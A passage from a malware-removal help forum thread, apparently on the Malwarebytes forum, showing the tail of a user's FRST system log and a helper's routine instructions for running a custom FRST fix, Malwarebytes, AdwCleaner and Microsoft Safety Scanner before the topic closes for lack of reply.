2021-10-05 20:10 - 2018-07-15 16:26 - 000002301 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2021-10-05 20:10 - 2018-07-15 16:26 - 000002260 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2021-10-05 15:42 - 2021-05-15 10:25 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2021-10-05 11:52 - 2021-06-28 06:44 - 000004170 _____ C:\WINDOWS\system32\Tasks\Opera scheduled assistant Autoupdate 1583006413
2021-10-05 08:22 - 2021-05-15 10:49 - 000003958 _____ C:\WINDOWS\system32\Tasks\Opera scheduled Autoupdate 1531693452
2021-10-05 08:22 - 2018-07-15 16:24 - 000001113 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Opera Browser.lnk
2021-10-04 21:37 - 2020-01-19 19:48 - 000000000 ____D C:\Users\User\AppData\Local\Battle.net
2021-10-04 15:25 - 2020-01-19 19:52 - 000000000 ____D C:\ProgramData\Blizzard Entertainment
2021-10-04 15:03 - 2020-01-19 19:42 - 000000000 ____D C:\Program Files (x86)\Battle.net
2021-10-04 15:02 - 2020-01-19 19:48 - 000000000 ____D C:\Users\User\AppData\Roaming\Battle.net
2021-10-04 10:51 - 2021-05-15 10:31 - 000002438 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2021-10-04 10:51 - 2021-05-15 10:31 - 000002276 _____ C:\Users\Public\Desktop\Microsoft Edge.lnk
2021-10-01 23:03 - 2021-06-14 15:36 - 000003480 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2021-10-01 23:03 - 2021-06-14 15:36 - 000003386 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore1d749a94146afaf
2021-10-01 17:34 - 2021-05-15 10:49 - 000003378 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-1006842105-1920769258-2521470405-1001
2021-10-01 17:34 - 2021-05-15 10:05 - 000002380 _____ C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2021-10-01 12:11 - 2021-03-20 13:54 - 012566520 _____ C:\WINDOWS\system32\Drivers\FACEIT.sys
2021-10-01 12:03 - 2021-05-15 10:49 - 000003420 _____ C:\WINDOWS\system32\Tasks\GoogleUpdateTaskMachineUA
2021-10-01 12:03 - 2021-05-15 10:49 - 000003296 _____ C:\WINDOWS\system32\Tasks\GoogleUpdateTaskMachineCore
2021-09-30 21:16 - 2021-06-21 12:27 - 000002136 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2021-09-28 20:59 - 2018-12-29 17:18 - 000000000 ____D C:\Users\User\AppData\Roaming\.ACEStream
2021-09-22 20:47 - 2020-03-22 17:26 - 000002249 _____ C:\Users\User\Desktop\FACEIT.lnk
2021-09-20 21:29 - 2018-08-11 14:12 - 000000000 ____D C:\Users\User\AppData\Local\D3DSCache
2021-09-18 22:27 - 2018-07-28 15:02 - 000000000 ____D C:\Users\User\AppData\Roaming\discord
2021-09-18 21:36 - 2018-07-28 15:02 - 000000000 ____D C:\Users\User\AppData\Local\Discord
2021-09-15 08:17 - 2021-06-21 12:28 - 000004562 _____ C:\WINDOWS\system32\Tasks\Adobe Acrobat Update Task

==================== Files in the root of some directories ========

2021-10-04 15:30 - 2021-10-04 15:30 - 000000000 _____ () C:\Users\User\AppData\Local\D21F5E.tmp
2021-10-04 19:10 - 2021-10-04 19:10 - 000000000 _____ () C:\Users\User\AppData\Local\D243BC.tmp
2021-10-04 15:30 - 2021-10-04 15:30 - 000000000 _____ () C:\Users\User\AppData\Local\D2647.tmp
2021-10-05 11:58 - 2021-10-05 11:58 - 000000000 _____ () C:\Users\User\AppData\Local\D27C45.tmp
2021-10-05 21:00 - 2021-10-05 21:00 - 000000000 _____ () C:\Users\User\AppData\Local\D290DB.tmp
2021-10-04 16:29 - 2021-10-04 16:29 - 000000000 _____ () C:\Users\User\AppData\Local\D2EBB3.tmp

==================== SigCheck ============================

(There is no automatic fix for files that do not pass verification.)

==================== End of FRST.txt ========================

  • Thanks 1
Link to post
Share on other sites

Hello colbski,

Thanks for the update, continue:

Please download the attached fixlist.txt file and save it to the Desktop or location where you ran FRST from.

NOTE. It's important that both files, FRST or FRSTEnglish, and fixlist.txt are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on this particular machine. Running this on another machine may cause damage to your operating system that cannot be undone.

Run FRST or FRST64 and press the Fix button just once and wait.
If the tool needs a restart please make sure you let the system restart normally and let the tool complete its run after restart.
The tool will make a log on the Desktop (Fixlog.txt) or wherever you ran FRST from. Please attach or post it to your next reply.

Note: If the tool warned you about an outdated version please download and run the updated version.

NOTE-1: This fix will run a scan to check that all Microsoft operating system files are valid and not corrupt and attempt to correct any invalid files.

NOTE-2: As part of this fix all temporary files will be removed. If you have any open web pages that have not been bookmarked please make sure you bookmark them now as all open applications will be automatically closed. Also, make sure you know the passwords for all websites as cookies will also be removed.

The following directories are emptied:
 
  • Windows Temp
  • Users Temp folders
  • Edge, IE, FF, Chrome and Opera caches, HTML5 storages, Cookies and History
  • Recently opened files cache
  • Flash Player cache
  • Java cache
  • Steam HTML cache
  • Explorer thumbnail and icon cache
  • BITS transfer queue (qmgr*.dat files)
  • Recycle Bin


Important: items are permanently deleted. They are not moved to quarantine. If you have any questions or concerns please ask before running this fix.

user posted image

The system will be rebooted after the fix has run.

Next,

Download Malwarebytes version 4 from the following link:

https://www.malwarebytes.com/mwb-download/thankyou/

Double click on the installer and follow the prompts.

When the install completes or Malwarebytes is already installed do the following:

Open Malwarebytes, select > small cog wheel top right hand corner, that will open "settings" from there select "Security" tab.

Scroll down to "Scan Options" ensure Scan for Rootkits and Scan within Archives are both on....

Close out the settings window, this will take you back to "DashBoard" select the Blue "Scan Now" tab......

When the scan completes quarantine any found entries...

To get the log from Malwarebytes do the following:
 
  • Open Malwarebytes
  • Click on the Detection History tab > from main interface.
  • Then click on "History" that will open to a historical list
  • Double click on the Scan log which shows the Date and time of the scan just performed.
  • Click Export > From export you have two options:
    Copy to Clipboard - if seleted right click to your reply and select "Paste" log will be pasted to your reply
    Text file (*.txt) - if selected you will have to name the file and save to a place of choice, recommend "Desktop" then attach to reply

     
  • Please use "Text file (*.txt), then name the file and save to a place of choice, recommend "Desktop" then attach to reply


Next,

Download AdwCleaner by Malwarebytes onto your Desktop.

Or from this Mirror
 
  • Right-click on AdwCleaner.exe and select http://i.imgur.com/Spcusrh.pngRun as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users)
  • Accept the EULA (I accept), then click on Scan
  • Let the scan complete. Once it's done, make sure that every item listed in the different tabs is checked and click on the Quarantine button. This will kill all the active processes
  • Once the cleaning process is complete, AdwCleaner will ask to restart your computer, do it
  • After the restart, a log will open when logging in. Please copy/paste the content of that log in your next reply


Next,

Download "Microsoft's Safety Scanner" and save direct to the desktop

Ensure to get the correct version for your system....

https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/safety-scanner-download


Right click on the Tool, select Run as Administrator the tool will expand to the options Window
In the "Scan Type" window, select Quick Scan
Perform a scan and Click Finish when the scan is done.


Retrieve the MSRT log as follows, and post it in your next reply:

1) Select the Windows key and R key together to open the "Run" function
2) Type or Copy/Paste the following command to the "Run Line" and Press Enter:

notepad c:\windows\debug\msert.log

The log will include log details for each time MSRT has run, we only need the most recent log by date and time....

Let me see those logs in your reply...

Thank you,

Kevin.

fixlist.txt

Link to post
Share on other sites

Due to the lack of feedback, this topic is closed to prevent others from posting here.

If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this topic with your request.

This applies only to the originator of this topic. Other members who need assistance please start your own topic in a new thread.

Tips to help protect from infection

Thanks

 

Link to post
Share on other sites

Guest
This topic is now closed to further replies.
  • Recently Browsing   0 members

    • No registered users viewing this page.
Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.